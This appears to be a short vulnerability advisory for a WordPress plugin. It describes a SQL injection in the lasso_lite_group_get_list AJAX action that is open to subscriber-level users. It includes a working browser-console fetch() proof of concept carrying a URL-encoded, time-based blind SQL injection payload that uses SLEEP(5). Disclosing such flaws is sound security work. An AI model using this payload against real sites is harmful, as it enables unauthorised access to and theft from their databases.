The plugin does not escape some parameters before using them in various SQL statements used by AJAX actions available by any authenticated users, leading to a SQL injection exploitable by low privilege users such as subscriber.
Run the below command in the developer console of the web browser while being on the blog as a subscriber user and notice the delay of 5s to receive the response fetch("/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "method": "POST", "body": 'action=lasso_lite_group_get_list&page=1&keyword=v%27%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F9434%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%285%29%29%29kcCp%29%2F%2A%2A%2FAND%2F%2A%2A%2F%27oJFG%27%3D%27oJFG', "credentials": "include" }).then(response => response.text()) .then(data => console.log(data));
2023-01-17 (about 4 months ago)
2023-01-17 (about 4 months ago)
2023-01-17 (about 4 months ago)